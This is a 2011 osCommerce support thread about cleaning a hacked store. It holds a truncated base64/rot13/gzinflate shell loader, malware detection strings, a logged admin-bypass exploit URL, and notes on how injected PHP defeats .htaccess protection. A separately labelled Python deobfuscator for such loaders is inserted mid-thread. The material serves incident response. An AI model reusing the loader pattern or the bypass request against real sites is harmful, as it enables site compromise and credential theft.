germ, posted March 26, 2011:

You are sadly mistaken, Sir. :blush:

--
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
♥FWR Media, posted March 26, 2011:

> You are sadly mistaken, Sir. :blush:

He is not mistaken actually.

--
Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls
KissMT Dynamic SEO Meta & Canonical Header Tags
KissER Error Handling and Debugging
KissIT Image Thumbnailer
Security Pro - Querystring protection against hackers ( a KISS contribution )
If you found my post useful please click the "Like This" button to the right.
Please only PM me for paid work.
qwertyjjj (thread author), posted March 26, 2011:

> He is not mistaken actually.

It is protected behind the webserver and in the public folder, so the only way in would be through a webpage hack..?
Taipo, posted March 26, 2011:

> Well, it reports these but it even reports its own files as positives so I'm not sure of the results. I checked the cookie_usage files and mail.php and these are all oscommerce defaults.
>
>     Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/AV/grep.php (Known automated hack <=> error_reporting(0) ) on line: 44
>     Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/AV/index.php (Known automated hack <=> error_reporting(0) ) on line: 11
>     ...........
>     File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/german/cookie_usage.php (Known filename threat)
>     File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/english/cookie_usage.php (Known filename threat)

I would suggest that you take some time to read this:
http://www.oscommerce.com/forums/topic/372970-malware-cookie-usagephp-explained/
and
http://www.oscommerce.com/forums/topic/373047-a-chat-about-file-permissions/

There are a couple of spiels I wrote on file infections, and they do cover some issues around file permissions. The question you then need to answer for yourself, which is also discussed in those two posts, is which method of server configuration your server sits on. My guess is that it is method 2, since so many files that would normally be expected to have read-only permissions have been affected. If method two, then approaching this from a write-able perspective is probably the wrong approach.

No matter which method is being employed on your server, you will need to remove ALL of the offending code that is either resident in uploaded files or has been appended into current Oscommerce files. You will need to either restore your site with a version that does not have infected files, or start with a new version of the oscommerce script altogether if you do not have a safe backup to use. Then apply all the security fixes before putting it back online.

--
- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
qwertyjjj (thread author), posted March 27, 2011:

> I would suggest that you take some time to read this:
> http://www.oscommerce.com/forums/topic/372970-malware-cookie-usagephp-explained/
> and
> http://www.oscommerce.com/forums/topic/373047-a-chat-about-file-permissions/
>
> There are a couple of spiels I wrote on file infections, and they do cover some issues around file permissions. The question you then need to answer for yourself, which is also discussed in those two posts, is which method of server configuration your server sits on. My guess is that it is method 2, since so many files that would normally be expected to have read-only permissions have been affected. If method two, then approaching this from a write-able perspective is probably the wrong approach.
>
> No matter which method is being employed on your server, you will need to remove ALL of the offending code that is either resident in uploaded files or has been appended into current Oscommerce files. You will need to either restore your site with a version that does not have infected files, or start with a new version of the oscommerce script altogether if you do not have a safe backup to use. Then apply all the security fixes before putting it back online.

Err... none of those files listed are infected. They just have the eval function in them, that's all.
Taipo, posted March 27, 2011:

> Err... none of those files listed are infected. They just have the eval function in them, that's all.

That is the point. You need to go through your files and rid them of the virus code (where your test rendered 'Possible Infection'), but that does not get rid of the method by which the code was installed. If you see that eval code in your files, or similar code, then it is by that code that the attackers are able to install the virus code, and you would be doing yourself a big favor by restoring an original of those files rather than leaving them on your server.

Some of the eval code in itself decodes to be virus importers. The eval function you mentioned IS the virus. In general though, if they are not obfuscated virus code themselves, they are a backdoor system that allows an attacker to install pretty much whatever they so desire onto your site; in this case they have planted javascript iframes, probably into other files.

Hope that makes sense.
qwertyjjj (thread author), posted March 27, 2011:

> That is the point. You need to go through your files and rid them of the virus code (where your test rendered 'Possible Infection'), but that does not get rid of the method by which the code was installed. If you see that eval code in your files, or similar code, then it is by that code that the attackers are able to install the virus code, and you would be doing yourself a big favor by restoring an original of those files rather than leaving them on your server.
>
> Some of the eval code in itself decodes to be virus importers. The eval function you mentioned IS the virus. In general though, if they are not obfuscated virus code themselves, they are a backdoor system that allows an attacker to install pretty much whatever they so desire onto your site; in this case they have planted javascript iframes, probably into other files.
>
> Hope that makes sense.

All the eval code is native to oscommerce though?! eg

    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/functions/general.php (Known automated hack <=> eval( ) on line: 482

    $statecomma = '';
    $streets = $street;
    if ($suburb != '') $streets = $street . $cr . $suburb;
    if ($state != '') $statecomma = $state . ', ';
    $fmt = $address_format['format'];
    eval("\$address = \"$fmt\";");

or

    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/header_tags.php (Known automated hack <=> eval( ) on line: 876

    function SortFileList($data, $keys) {
      // List As Columns
      foreach ($data as $key => $row) {
        foreach ($keys as $k) {
          $cols[$k['key']][$key] = $row[$k['key']];
        }
      }
      // List original keys
      $idkeys = array_keys($data);
      // Sort Expression
      $i = 0;
      $sort = '(array)';
      foreach ($keys as $k) {
        if ($i > 0) { $sort .= ','; }
        $sort .= '$cols[' . $k['key'] . ']';
        if ($k['sort']) { $sort .= ',SORT_' . strtoupper($k['sort']); }
        if ($k['type']) { $sort .= ',SORT_' . strtoupper($k['type']); }
        $i++;
      }
      $sort .= ',$idkeys';
      $sort = 'array_multisort(' . $sort . ');';
      // Sort Funct
      eval($sort);
      foreach ($idkeys as $idkey) {
        // Rebuild Full Array
        $result[$idkey] = $data[$idkey];
      }
      return $result;
    }
Taipo, posted March 27, 2011:

Sorry, I haven't used the Virus Threat scan, but hopefully you can custom design the searches? What you need to be looking for are strings that begin as follows:

1/ eval(base64_decode... (in fact anything with base64_decode in it)
2/ if(@$_REQUEST['cookies']==1){

The point being, there are usually two types of files on infected websites: one is the code that acts like a file manager, which it seems you found already in your images directory, and the other is often a backdoor code that allows an attacker to upload further files should you patch the admin bypass exploit that is resident in early versions of Oscommerce. The backdoor code acts as a file uploader and file permissions changer.

If you have been through your files and have not found any of those, then all the attacker has done is upload the filemanager/shell code into your images folder. So that is the other question: have you patched the admin bypass exploit?
qwertyjjj (thread author), posted March 27, 2011:

> Sorry, I haven't used the Virus Threat scan, but hopefully you can custom design the searches? What you need to be looking for are strings that begin as follows:
>
> 1/ eval(base64_decode... (in fact anything with base64_decode in it)
> 2/ if(@$_REQUEST['cookies']==1){
>
> The point being, there are usually two types of files on infected websites: one is the code that acts like a file manager, which it seems you found already in your images directory, and the other is often a backdoor code that allows an attacker to upload further files should you patch the admin bypass exploit that is resident in early versions of Oscommerce. The backdoor code acts as a file uploader and file permissions changer.
>
> If you have been through your files and have not found any of those, then all the attacker has done is upload the filemanager/shell code into your images folder. So that is the other question: have you patched the admin bypass exploit?

No files have those keywords in cookies or base64_decode. I am not sure I have made any admin bypass scripts, but my admin folder is protected by htaccess IP address limitation, so I guess it is about 99% protected. What is the admin bypass correction?
Taipo, posted March 27, 2011:

Patching the $PHP_SELF code in both application_top.php files.

So far I have found all manner of files that have been uploaded to attacked websites. Some of them are even as brazen as to just be an upload code that is not obfuscated by base64 code. The main point of all of this is, if you have cleaned up your site, added the security patches, and files are still being overwritten, then there is probably a high chance you missed one of these files somewhere.

The question I pose then in that scenario is, would it not be better to build a new site using 2.3.1 of oscommerce and import your products and customer database into the new store? If it's a matter of time and energy, it seems to me to be about equal in the final analysis.

If you haven't already, have a look at the contrib I wrote in my signature; as a part of the fix it has the patched PHP_SELF code in it.
qwertyjjj (thread author), posted April 21, 2011:

I have today found another file in the images folder called tebs.php with the following code:

    <?php
    $language = 'eng';
    $auth = 0;
    $name = ''; // md5 Login
    $pass = ''; // md5 Password
    /**************************************************************************************************************************************************************/
    error_reporting(0);
    $rhs="...
    ...goes on for about 100 lines like this with random letters
    eval(gzinflate(str_rot13(base64_decode($rhs))));
    ?>

No idea how it got there, but no other files are reported as changed by Sitemonitor. My admin folder is locked down by IP range with an htaccess file, so there's no way they could have got in through the admin folder/files. Any ideas what to check?

Virus scan shows these files but they all seem normal oscommerce code:

    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/AV/grep.php (Known automated hack <=> error_reporting(0) ) on line: 44
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/AV/index.php (Known automated hack <=> error_reporting(0) ) on line: 11
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/configuration.php (Known automated hack <=> eval( ) on line: 125
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/sitemonitor_configure_0.php (Known Hacker <=> Assel ) on line: 21
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/sitemonitor_configure_0.php (Known automated hack <=> eval( ) on line: 21
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/sitemonitor_configure_0.php (Known automated hack <=> gzdecode ) on line: 21
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/sitemonitor_configure_0.php (Known automated hack <=> iframe) on line: 21
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/sitemonitor_configure_0.php (Known automated hack <=> error_reporting(0) ) on line: 21
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/sitemonitor_configure_0.php (Known automated hack <=> shell_exec ) on line: 21
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/modules.php (Known automated hack <=> eval( ) on line: 218
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/javascript/spiffyCal/spiffyCal_v2_1.js (Known automated hack <=> eval( ) on line: 76
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/javascript/calendarcode.js (Known automated hack <=> eval( ) on line: 57
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/general.php (Known automated hack <=> eval( ) on line: 405
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/sitemonitor_functions.php (Known Hacker <=> Assel ) on line: 381
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/sitemonitor_functions.php (Known automated hack <=> eval( ) on line: 381
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/sitemonitor_functions.php (Known automated hack <=> gzdecode ) on line: 381
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/sitemonitor_functions.php (Known automated hack <=> iframe) on line: 381
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/sitemonitor_functions.php (Known automated hack <=> error_reporting(0) ) on line: 381
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/sitemonitor_functions.php (Known automated hack <=> shell_exec ) on line: 381
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/header_tags.php (Known automated hack <=> eval( ) on line: 876
    File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/languages/espanol/mail.php (Known filename threat)
    File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/languages/german/mail.php (Known filename threat)
    File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/languages/english/mail.php (Known filename threat)
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/modules/newsletters/product_notification.php (Known automated hack <=> eval( ) on line: 61
    File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/mail.php (Known filename threat)
    File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/cookie_usage.php (Known filename threat)
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/functions/general.php (Known automated hack <=> eval( ) on line: 482
    Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/functions/compatibility.php (Known automated hack <=> eval( ) on line: 84
    File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/espanol/cookie_usage.php (Known filename threat)
    File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/german/cookie_usage.php (Known filename threat)
    File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/english/cookie_usage.php (Known filename threat)
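The tebs.php file above is a loader: a long string is base64-decoded, rot13-shifted, inflated and handed to eval(). An analyst wants to see what is inside without ever running it. The following is an added example (not code from this thread or from osCommerce) that peels those layers statically in Python, using the same function names the loader calls; the loader text it decodes is constructed here around a harmless echo statement, and the indicator list is an assumed starting set, not a complete one.

```python
"""Static unwrapper for the eval(gzinflate(str_rot13(base64_decode($var)))) loader
pattern seen in tebs.php. Added example, not code from the thread; the loader
text below is constructed here and wraps a harmless echo, not real shell code."""
import base64
import re
import zlib

# Loader line: eval( f1( f2( ... ( $var ) ... ) ) );  captures the wrapper chain and the variable name
LOADER_RE = re.compile(r'eval\s*\(\s*((?:\w+\s*\(\s*)+)\$(\w+)\s*\)+\s*;')


def php_str_rot13(data: bytes) -> bytes:
    """PHP's str_rot13 only shifts ASCII letters, so operate on bytes, not str."""
    out = bytearray()
    for b in data:
        if 65 <= b <= 90:
            out.append((b - 65 + 13) % 26 + 65)
        elif 97 <= b <= 122:
            out.append((b - 97 + 13) % 26 + 97)
        else:
            out.append(b)
    return bytes(out)


# PHP function name -> pure-Python equivalent (no PHP interpreter; nothing is executed)
DECODERS = {
    'base64_decode': base64.b64decode,
    'str_rot13': php_str_rot13,
    'gzinflate': lambda d: zlib.decompress(d, -zlib.MAX_WBITS),       # raw DEFLATE
    'gzuncompress': lambda d: zlib.decompress(d),                     # zlib-wrapped
    'gzdecode': lambda d: zlib.decompress(d, 16 + zlib.MAX_WBITS),   # gzip-wrapped
}

# Markers worth flagging in the decoded text (an assumed starting list, not exhaustive)
INDICATORS = ('$_REQUEST', '$_POST', '$_GET', 'move_uploaded_file', 'shell_exec',
              'system(', 'passthru', 'chmod(', 'fwrite(', 'file_put_contents')


def unwrap_loader(source: str):
    """Return (wrapper_chain, decoded_text), or None if the file has no such loader."""
    m = LOADER_RE.search(source)
    if not m:
        return None
    chain = re.findall(r'(\w+)\s*\(', m.group(1))          # outermost call first
    var = m.group(2)
    assign = re.search(r'\$' + re.escape(var) + r'\s*=\s*([\'"])(.*?)\1\s*;', source, re.S)
    if not assign:
        return None
    payload = assign.group(2).encode('ascii')
    for fn in reversed(chain):                               # PHP applies the innermost call first
        if fn not in DECODERS:
            raise ValueError('unknown wrapper: ' + fn)
        payload = DECODERS[fn](payload)
    return chain, payload.decode('utf-8', errors='replace')


def indicators(decoded: str):
    """Which of the INDICATORS appear in the decoded text."""
    return [i for i in INDICATORS if i in decoded]


# --- constructed sample: encode a harmless snippet the way the loader expects ---
def build_sample_loader(plain: bytes) -> str:
    co = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)       # raw DEFLATE, like gzdeflate()
    deflated = co.compress(plain) + co.flush()
    blob = base64.b64encode(php_str_rot13(deflated)).decode('ascii')
    return ('<?php\nerror_reporting(0);\n$rhs="' + blob + '";\n'
            'eval(gzinflate(str_rot13(base64_decode($rhs))));\n?>\n')


SAMPLE_PLAIN = b'<?php echo "hello from the decoded payload"; ?>'
SAMPLE_LOADER = build_sample_loader(SAMPLE_PLAIN)

if __name__ == '__main__':
    chain, text = unwrap_loader(SAMPLE_LOADER)
    print('wrappers:', ' -> '.join(chain))
    print('decoded :', text)
    print('flags   :', indicators(text) or 'none')
```

Run it against a copy of the suspect file taken off the server (read with open(path).read() and passed to unwrap_loader) rather than on the live site; the decoded text is what the scanner's "eval(" hit actually hides, and the indicator list is where to start reading it.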
Taipo, posted April 21, 2011:

It looks to me like there are still a number of files on your system that still have rogue code appended in them, which is allowing attackers to upload more files to your site, files which are in fact filemanagers. Until you find them all, this will not go away.

Even using htaccess in directories will not protect you in some server configurations when there is code that has been inserted into your files that allows an attacker to upload files and write/append into files.... that big long string that you shortened decodes to allow them to do that. There WILL be code in other files that allows them to place files like that into directories like the images directory.

There is no easy answer; the decision is yours which is 'easier'.

1. go through every file and match the code to the original file set code, or
2. build a new site in the latest 2.3.1 code and remove the old site, replacing it with the new code (rather than overwriting, which can still leave rogue code resident in rogue files).

If you consider the fact that your site has been hacked and rehacked since mid March, and the amount of time and stress you have put into plugging up the holes, you may want to consider the second option, which, while being a right pain in the proverbial to do, is at least all over and done with in a week.
Taipo, posted April 21, 2011:

> How is the images folder open to hacking? I have put this in now:
>
>     <FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">
>     Order Deny,Allow
>     Deny from all
>     </FilesMatch>

Simply put, if your site is hosted on a server configuration where PHP has owner permissions.... then.... in that instance:

Example 1: A rogue PHP script that has been appended into one of the site's files can be configured to rename your htaccess file to something else, complete its business, then rename the htaccess back to its original name.

Example 2: A rogue PHP script that has been appended into one of the site's files can add a file into any directory no matter what the permissions are, since PHP itself has owner permissions.

Example 3: A rogue PHP script that has been appended into one of the site's files can be used to read the contents of the file and directory listing and find the renamed admin directory; the htaccess in it is then renamed, and the admin bypass exploit (which is almost never patched by users who are advised to hide their admin directories and/or protect them using htaccess) is used to give the attacker full access to your admin section, where they add themselves again as an administrator and access all your files. The same appended code is used to read the config file and get the database user and password, and with all of that they can then have a party at your expense.... so to speak. Lastly, if they want to be nice about it, they return the htaccess to its former name and return any file and directory permissions to their original settings.

Meanwhile this issue was patched last year in Oscommerce 2.3.1 => that really is the best place to start.
qwertyjjj (thread author), posted April 22, 2011:

> It looks to me like there are still a number of files on your system that still have rogue code appended in them, which is allowing attackers to upload more files to your site, files which are in fact filemanagers. Until you find them all, this will not go away.
>
> Even using htaccess in directories will not protect you in some server configurations when there is code that has been inserted into your files that allows an attacker to upload files and write/append into files.... that big long string that you shortened decodes to allow them to do that. There WILL be code in other files that allows them to place files like that into directories like the images directory.
>
> There is no easy answer; the decision is yours which is 'easier'.
>
> 1. go through every file and match the code to the original file set code, or
> 2. build a new site in the latest 2.3.1 code and remove the old site, replacing it with the new code (rather than overwriting, which can still leave rogue code resident in rogue files).
>
> If you consider the fact that your site has been hacked and rehacked since mid March, and the amount of time and stress you have put into plugging up the holes, you may want to consider the second option, which, while being a right pain in the proverbial to do, is at least all over and done with in a week.

All the files I listed above that have eval in them are the oscommerce files, aren't they, that also use eval code?

I have some of my own code in some oscommerce files, which is going to cause difficulties. If I upgrade (I have 2.2RC1), then how can I put customised code back in the correct places?

I suppose it is possible that my oscommerce site isn't the issue and that another of my sites has allowed a hacker to post php code, but it only ever gets placed in the image folder.
Taipo, posted April 22, 2011:

> All the files I listed above that have eval in them are the oscommerce files, aren't they, that also use eval code?

If you are experiencing attacks where files are being uploaded into the images directory, then you have to assume that there is another file or files in your web directory somewhere that is either a rogue file or a stock site file that has been added to, which allows for at least file uploading. The eval() function in conjunction with base64_decode is just one method used by attackers when adding code to site files; sometimes their appended code is not obfuscated at all and is in plain view, as in what that string would look like decoded.

Have you patched the admin bypass exploit hole in 2.2RC1? And in asking that I don't mean "have you hidden the security hole, like changing the admin directory name"; I am meaning have you patched, as in replaced the faulty code?

> I suppose it is possible that my oscommerce site isn't the issue and that another of my sites has allowed a hacker to post php code, but it only ever gets placed in the image folder.

Do you have logging enabled? If so you should be able to find the POST request in the logs that resulted in the file being uploaded. That may yield you some info about where the file upload is coming from. I would assume that the image directory permissions are 777 on your server, where 755 is a read-only setting? (this differs in some server configurations).

Generally, as in 99% of the time, the placing of rogue filemanagers into your images directory is an automated event by spam servers that are programmed to seed those types of shell files as far and wide as they can into as many website files as possible. What this means is that it is more likely that they have exploited either the admin bypass exploit (which is patched in 2.3.1) or are exploiting another file that has been adjusted in your site, rather than traversing in from another virtualhost on the same server. The effort it would take to traverse into your site is significant and not at all in character with what I have seen of this genre of attacks. Although in saying that, I have no clue as to the way you have configured your site, but I am just saying this on the face of the info you have provided so far.

> I have some of my own code in some oscommerce files, which is going to cause difficulties. If I upgrade (I have 2.2RC1), then how can I put customised code back in the correct places?

If that is your priority then stick with 2.2RC1; however, the best practice with any content management or open source script is to upgrade when the development team release a security update. Many of these types of attacks are completely dependent on the fact that most people do not upgrade. Transversely, these attacks would disappear from the map if people updated their scripts when a security release came out.
qwertyjjj (thread author), posted April 22, 2011:

> If you are experiencing attacks where files are being uploaded into the images directory, then you have to assume that there is another file or files in your web directory somewhere that is either a rogue file or a stock site file that has been added to, which allows for at least file uploading. The eval() function in conjunction with base64_decode is just one method used by attackers when adding code to site files; sometimes their appended code is not obfuscated at all and is in plain view, as in what that string would look like decoded.
>
> Have you patched the admin bypass exploit hole in 2.2RC1? And in asking that I don't mean "have you hidden the security hole, like changing the admin directory name"; I am meaning have you patched, as in replaced the faulty code?
>
> Do you have logging enabled? If so you should be able to find the POST request in the logs that resulted in the file being uploaded. That may yield you some info about where the file upload is coming from. I would assume that the image directory permissions are 777 on your server, where 755 is a read-only setting? (this differs in some server configurations).
>
> Generally, as in 99% of the time, the placing of rogue filemanagers into your images directory is an automated event by spam servers that are programmed to seed those types of shell files as far and wide as they can into as many website files as possible. What this means is that it is more likely that they have exploited either the admin bypass exploit (which is patched in 2.3.1) or are exploiting another file that has been adjusted in your site, rather than traversing in from another virtualhost on the same server. The effort it would take to traverse into your site is significant and not at all in character with what I have seen of this genre of attacks. Although in saying that, I have no clue as to the way you have configured your site, but I am just saying this on the face of the info you have provided so far.
>
> If that is your priority then stick with 2.2RC1; however, the best practice with any content management or open source script is to upgrade when the development team release a security update. Many of these types of attacks are completely dependent on the fact that most people do not upgrade. Transversely, these attacks would disappear from the map if people updated their scripts when a security release came out.

> admin bypass exploit hole in 2.2RC1

Is this the bypass in the filemanager php file where you used to be able to upload and edit files? I deleted that file a while back.

My admin folder (now renamed) has a htaccess only allowing certain IP addresses; unless they know which IP address, it's unlikely they're getting in through the admin folder. Again, it's possible they know the IP ranges, but the fact I have it locked down like this and the fact that the hacker is probably getting in through an automated script rather than one targeted specifically at me makes the chances of this less.

Do you know a good file comparison software (free) that I could use to check the current site and also the default oscommerce site? I checked all the files with eval, base64, or system and all the code seems "normal" oscommerce functions.
Taipo Posted April 22, 2011 Share Posted April 22, 2011 admin bypass exploit hole in 2.2RC1 Is this the bypass in the filemanager php file where you used to be able to upload and edit files? I deleted that file a while back. No, and I doubt that there ever was an issue with the filemanager. The issue has always been with the $PHP_SELF code in 2.2.1 and earlier which allowed attackers to append login.php to admin filenames which bypassed the admin permissions. Since filemanager was one of the few files in the admin section that could actually change site files, I think the assumption became that this was the file at fault. The other faulty file was the earlier rendition of FCKEditor which has now been patched. I have included the patch for the admin bypass exploit in the contribution I wrote called osc_sec (see link in my signature). Try installing that addon and see if it also helps you out. At the least it will patch that issue which is the root cause of everything you are experiencing to date. My admin folder (now renamed) has a htaccess only allowing certain IP addresses, unless they know which IP address then it's unlikely they're getting in through the admin folder. Unless you are using the <LIMITEXCEPT> directive further up your htaccess, it is relatively trivial for an attacker to bypass an allow from xxx.xxx.xxx.xxx code written into the <LIMIT> directive in htaccess. <LimitExcept GET POST HEAD> Deny from all </LimitExcept> Put that in the very top of your htaccess and it will help secure your attempt to only allow from specific IP addresses. This will prevent anyone sending a request to your server unless it is a GET POST or HEAD request. That in conjuction with the... <Limit GET POST> order allow,deny deny from all allow from 111.111.111.111 (<= your IP address) </Limit> Is more secure than by itself. Do you know a good file comparison software (free) that I could check the current site and also the default oscommerce site? No I dont sorry. 
> I checked all the files with eval, base64, or system and all the code seems "normal" oscommerce functions.

These are the most common codes, but they are not the only ones I have seen. The fact that you now have another shell code in your images directory tells me there is appended code in one of your files which allows for at least file uploading and possibly file and directory permissions testing. Now that there has been a shell code added into your images directory, you should assume then that it was also possible for an attacker to use that newly added file to make changes to files in your website. At the very least these rogue filemanager type shell files can be used to 'read' the content of files, for instance the configure.php file, which would allow them to get a copy of your database's user and password stored in there. Some of the appended code is also javascript, IFRAMEs, straight PHP upload code with no hiding behind base64, and there is also upload code that has been split over several files, and more.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
qwertyjjj Posted April 22, 2011

> Now that there has been a shell code added into your images directory, you should assume then that it was also possible for an attacker to use that newly added file to make changes to files in your website. At the very least these rogue filemanager type shell files can be used to 'read' the content of files, for instance the configure.php file, which would allow them to get a copy of your databases user and password stored in there.

SiteMon didn't show any other file or date changes within the site, so a file was uploaded to images but that was all.

Like this?

    <LimitExcept GET POST HEAD>
    Deny from all
    </LimitExcept>

    <Limit GET POST>
    order allow,deny
    deny from all
    Allow from xx.xx.x.x/11
    </Limit>

That seems to block me completely.
qwertyjjj Posted April 22, 2011

I just received this, does it mean everything is ok?

    This IP [ 70.32.97.156 ] has been htaccess banned on the http://www.mysite.co.uk website by osc_sec.php version 2.4.[r6]
    REASON FOR BAN: Exploit attempt using blacklisted request string: .php/login.php, attempted GET String Injection using blacklisted item: 'php/login', Time of ban: Sat, 23 Apr 2011 04:36:00

    ######## ALL $_POST FORM VARIABLES #######
    #
    # - No POST form data
    #
    ##########################################

    ######### ALL $_SERVER VARIABLES #########
    #
    # - HOME = /home6c/sub002/sc11883-LGVN
    # - HTTP_TE = deflate,gzip;q=0.3
    # - HTTP_CONNECTION = TE, close
    # - HTTP_HOST = www.mysite.co.uk
    # - HTTP_USER_AGENT = Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1
    # - PATH = /usr/bin:/bin
    # - SERVER_SIGNATURE = <address>Apache Server at www.mysite.co.uk Port 80</address>
    # - SERVER_SOFTWARE = Apache
    # - SERVER_NAME = www.mysite.co.uk
    # - SERVER_ADDR = 10.0.12.1
    # - SERVER_PORT = 80
    # - REMOTE_ADDR = 70.32.97.156
    # - DOCUMENT_ROOT = /home6c/sub002/sc11883-LGVN/mysite.co.uk
    # - SERVER_ADMIN = [no address given]
    # - SCRIPT_FILENAME = /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/index.php
    # - REMOTE_PORT = 33754
    # - GATEWAY_INTERFACE = CGI/1.1
    # - SERVER_PROTOCOL = HTTP/1.1
    # - REQUEST_METHOD = GET
    # - QUERY_STRING = cPath=21/admin/file_manager.php/login.php
    # - REQUEST_URI = /cart/index.php?cPath=21/admin/file_manager.php/login.php
    # - SCRIPT_NAME = /cart/index.php
    # - PHP_SELF = /cart/index.php
    # - REQUEST_TIME = 1303490160
    # - HTTP_REFERER = None
    #
    # 2 methods of setting $PHP_SELF:
    # - Method 1 (from latest oscommerce) reports the filename as index.php
    # - Method 2 (uses $phpSelf function) reports the filename as index.php
    #
    ##########################################

    ######### ALL $_GET VARIABLES #########
    #
    # cPath=21/admin/file_manager.php/login.php
    #
    ##########################################

    OTHER INFO
    $oscsec_threshold=1
    /home6c/sub002/sc11883-LGVN/mysite.co.uk//cart/.htaccess is htaccess writeable = 1
    Resolve IP address: http://www.ipinfodb.com/ip_locator.php?ip=70.32.97.156
    Search Project Honeypot: http://www.projecthoneypot.org/ip_70.32.97.156

    This email was generated by Osc_Sec.php. To disable email notifications, open the osc_sec.php file, and in the Settings section change $emailenabled = 1 to $emailenabled = 0
    Keep up with the latest version of osc_sec.php at http://www.oscommerce.com/community/contributions,7834
    See discussions at http://www.digistore.co.nz/forum/viewtopic.php?id=2304 or email [email protected] with any suggestions.
Taipo Posted April 22, 2011

> SiteMon didn't show any other file or date changes within the site, so a file was uploaded to images but that was all.

Unless the attacker was able to find your admin directory, or able to bypass the htaccess blocking in the way I described, the other option is that there is a piece of appended code in one of your site files that must have been resident there before you installed SiteMon? (assuming that SiteMon is doing its job correctly)

> Like this?
>
> <LimitExcept GET POST HEAD>
> Deny from all
> </LimitExcept>
>
> <Limit GET POST>
> order allow,deny
> deny from all
> Allow from xx.xx.x.x/11
> </Limit>
>
> That seems to block me completely.

    <LimitExcept GET POST>
    Deny from all
    </LimitExcept>

    <Limit GET POST>
    order allow,deny
    deny from all
    allow from [your_external_ip_address]
    </Limit>

Just put your external IP address in the allow from. BTW what code were you using prior to this to allow only your IP address?
Taipo Posted April 22, 2011

> I just received this, does it mean everything is ok?

Yup, that's just an email notification to let you know that an attempt was made, the IP was banned in the htaccess file. If you have a look in that htaccess file you should see where osc_sec has added the code, down the bottom.

The attack was aimed at ...

    http://www.yoursite.co.uk/cart/index.php?cPath=21/admin/file_manager.php/login.php

... which is aimed at exploiting the admin bypass security hole in OSC_2.2.1 which is in the $PHP_SELF code that is patched in osc_sec.

If you get inundated with these attacks and get sick of receiving so many emails, you could either take out a gmail address or something just for your site, or just switch the email notifications off. Most site owners get about 6 or so of these a day, some get 100 an hour.
Taipo Posted April 22, 2011

